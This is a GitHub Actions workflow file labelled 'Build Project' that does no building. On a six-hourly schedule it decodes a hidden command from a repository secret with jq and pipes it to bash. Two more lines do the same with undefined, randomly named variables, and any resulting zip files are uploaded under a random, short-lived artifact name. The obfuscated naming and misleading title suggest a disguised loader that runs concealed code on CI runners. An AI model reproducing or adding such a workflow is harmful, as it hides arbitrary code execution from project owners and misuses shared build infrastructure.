name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '56 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  action:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Begin
        env:
          s6: ${{ secrets.s6 }}
        run: |
          printf '%s' "$s6" | jq -r .aq6 | /bin/bash
          printf '%s' "$hasyi74" | jq -r .kqp816 | /bin/bash
          echo $fu70269 | jq -r .qyei5 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: SKDyIK5y
          path: "*.zip"
          retention-days: 1
